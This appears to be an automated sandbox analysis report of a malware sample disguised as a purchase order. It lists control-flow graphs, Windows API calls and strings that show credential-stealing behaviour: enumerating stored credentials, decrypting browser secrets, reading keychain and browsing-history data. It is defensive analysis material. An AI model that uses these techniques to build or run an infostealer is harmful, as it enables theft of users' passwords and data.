85->104 162 445d67-445d6c 90->162 163 445d71-445d83 call 445093 90->163 196 445e17 91->196 197 445e1e-445e25 91->197 158 4456a9-4456b0 100->158 118 4457f9 104->118 119 4456ca-4456d3 call 413cfa call 413d4c 104->119 118->6 172 4456d8-4456f7 call 40b2cc call 413fa6 119->172 135->136 136->21 138->51 150->104 151->150 153->154 154->35 156->64 158->85 158->100 174 445fa1-445fa9 call 40b6ef 162->174 163->73 168->169 179 445d05-445d13 169->179 180 445d17 169->180 206 4456fd-445796 memset * 4 call 409c70 * 3 172->206 207 4457ea-4457f7 call 413d29 172->207 174->73 179->180 180->61 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 206->207 246 445798-4457ca call 40b2cc call 409d1f call 409b98 206->246 207->10 218->73 253 445f9b 218->253 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->207 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004455C2
                                                                                                      • wcsrchr.MSVCRT ref: 004455DA
                                                                                                      • memset.MSVCRT ref: 0044570D
                                                                                                      • memset.MSVCRT ref: 00445725
                                                                                                        • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                        • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                        • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                        • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                        • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                        • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                        • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                        • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                      • memset.MSVCRT ref: 0044573D
                                                                                                      • memset.MSVCRT ref: 00445755
                                                                                                      • memset.MSVCRT ref: 004458CB
                                                                                                      • memset.MSVCRT ref: 004458E3
                                                                                                      • memset.MSVCRT ref: 0044596E
                                                                                                      • memset.MSVCRT ref: 00445A10
                                                                                                      • memset.MSVCRT ref: 00445A28
                                                                                                      • memset.MSVCRT ref: 00445AC6
                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                        • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                        • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                        • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                        • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                        • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                      • memset.MSVCRT ref: 00445B52
                                                                                                      • memset.MSVCRT ref: 00445B6A
                                                                                                      • memset.MSVCRT ref: 00445C9B
                                                                                                      • memset.MSVCRT ref: 00445CB3
                                                                                                      • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                      • memset.MSVCRT ref: 00445B82
                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                      • memset.MSVCRT ref: 00445986
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                      • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                      • API String ID: 1963886904-3798722523
                                                                                                      • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                      • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                      • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                      • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                        • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                        • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                        • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                      • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                                                                      • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                                                                      • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                      • String ID: $/deleteregkey$/savelangfile
                                                                                                      • API String ID: 2744995895-28296030
                                                                                                      • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                      • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                      • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                      • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040B71C
                                                                                                        • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                        • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                      • wcsrchr.MSVCRT ref: 0040B738
                                                                                                      • memset.MSVCRT ref: 0040B756
                                                                                                      • memset.MSVCRT ref: 0040B7F5
                                                                                                      • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                      • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                      • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                      • memset.MSVCRT ref: 0040B851
                                                                                                      • memset.MSVCRT ref: 0040B8CA
                                                                                                      • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                        • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                      • memset.MSVCRT ref: 0040BB53
                                                                                                      • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                      • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                                                      • String ID: chp$v10
                                                                                                      • API String ID: 1297422669-2783969131
                                                                                                      • Opcode ID: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                                                                      • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                      • Opcode Fuzzy Hash: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                                                                                                      • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 504 40e2ab-40e2ce call 40695d call 406b90 508 40e2d3-40e2d5 504->508 509 40e4a0-40e4af call 4069a3 508->509 510 40e2db-40e300 508->510 511 40e304-40e316 call 406e8f 510->511 516 40e476-40e483 call 406b53 511->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 511->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->511 524->509 529 40e497-40e49f free 524->529 529->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 551 40e3b0 542->551 552 40e3b3-40e3c1 wcschr 542->552 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 549 40e3fb-40e40c memcpy 548->549 550 40e40f-40e414 548->550 549->550 553 40e416-40e427 memcpy 550->553 554 40e42a-40e42f 550->554 551->552 552->541 555 40e3c3-40e3c6 552->555 553->554 556 40e431-40e442 memcpy 554->556 557 40e445-40e44a 554->557 555->541 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                      • free.MSVCRT ref: 0040E49A
                                                                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                      • memset.MSVCRT ref: 0040E380
                                                                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                      • wcschr.MSVCRT ref: 0040E3B8
                                                                                                      • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E3EC
                                                                                                      • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E407
                                                                                                      • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E422
                                                                                                      • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E43D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                      • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                      • API String ID: 3849927982-2252543386
                                                                                                      • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                      • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                      • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                      • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 602 4094f7-4094fa call 424f26 598->602 600->567 602->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 617 4093e4-4093fb call 4253af * 2 613->617 615 4092bc 614->615 616 4092be-4092e3 memcpy memcmp 614->616 615->616 618 409333-409345 memcmp 616->618 619 4092e5-4092ec 616->619 617->602 627 409401-409403 617->627 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->602 628 409409-40941b memcmp 627->628 628->602 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->602 633 4094b8-4094ed memcpy * 2 630->633 631->602 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->602
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004091E2
                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                      • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                      • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                      • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                      • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                      • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                      • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                      • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                      • String ID:
                                                                                                      • API String ID: 3715365532-3916222277
                                                                                                      • Opcode ID: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                                                      • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                      • Opcode Fuzzy Hash: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                                                                                                      • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                        • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                        • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                        • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                        • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                        • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                      • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                      • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                      • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                        • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                        • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                        • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                      • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                      • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                      • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                      • String ID: bhv
                                                                                                      • API String ID: 4234240956-2689659898
                                                                                                      • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                      • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                      • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                      • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                      • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                      • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                      • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                      • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                      • API String ID: 2941347001-70141382
                                                                                                      • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                      • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                      • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                      • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040C298
                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                        • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                      • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                      • wcschr.MSVCRT ref: 0040C324
                                                                                                      • wcschr.MSVCRT ref: 0040C344
                                                                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                      • GetLastError.KERNEL32 ref: 0040C373
                                                                                                      • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                      • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                      • String ID: visited:
                                                                                                      • API String ID: 2470578098-1702587658
